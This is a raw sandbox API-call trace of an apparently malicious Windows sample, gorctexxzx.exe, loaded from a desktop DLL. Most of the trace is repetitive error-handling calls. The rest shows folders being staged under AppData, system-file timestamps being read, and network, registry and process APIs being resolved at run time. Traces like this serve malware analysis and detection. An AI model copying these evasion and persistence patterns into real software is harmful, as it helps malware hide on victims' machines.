(dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.090] SetLastError (dwErrCode=0x0) [0035.090] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.091] SetLastError (dwErrCode=0x0) [0035.091] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.092] SetLastError (dwErrCode=0x0) [0035.092] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.093] SetLastError (dwErrCode=0x0) [0035.093] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.094] SetLastError (dwErrCode=0x0) [0035.094] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.095] SetLastError (dwErrCode=0x0) [0035.095] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.096] SetLastError (dwErrCode=0x0) [0035.096] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.097] SetLastError (dwErrCode=0x0) [0035.097] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.098] GetLastError () returned 0x0 [0035.098] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.099] GetLastError () returned 0x0 [0035.099] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.100] SetLastError (dwErrCode=0x0) [0035.100] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetLastError () returned 0x0 [0035.101] SetLastError (dwErrCode=0x0) [0035.101] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0035.102] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0035.102] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0035.102] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f6e0 | out: lpSystemTimeAsFileTime=0x30f6e0*(dwLowDateTime=0xe29c5e30, dwHighDateTime=0x1d3dfba)) [0035.102] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f618, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.102] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f500, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetLastError () returned 0x0 [0035.103] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.103] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0035.103] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.103] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.103] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0035.103] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.103] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0035.103] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0035.103] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0035.104] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0035.104] GetLastError () returned 0xb7 [0035.104] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0035.104] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0035.104] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0035.104] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0035.104] wsprintfA (in: param_1=0x30f380, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.104] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0035.104] wsprintfA (in: param_1=0x30f27c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0035.104] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.104] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0035.104] CloseHandle (hObject=0x74) returned 1 [0035.104] GetLastError () returned 0x0 [0035.104] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0035.104] GetLastError () returned 0x0 [0035.104] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0035.104] GetSystemDirectoryA (in: lpBuffer=0x30f380, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0035.104] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0035.104] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0035.105] CloseHandle (hObject=0x74) returned 1 [0035.105] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.105] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.105] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0035.106] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0035.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0035.106] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0035.106] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0035.106] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0035.106] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0035.106] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.106] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.106] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.107] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.108] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.108] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.108] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.108] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.108] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.108] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.109] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.109] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.109] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.109] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.109] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.109] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.109] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.109] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.111] HeapDestroy (hHeap=0x1340000) returned 1 Process: id = "54" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xd04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 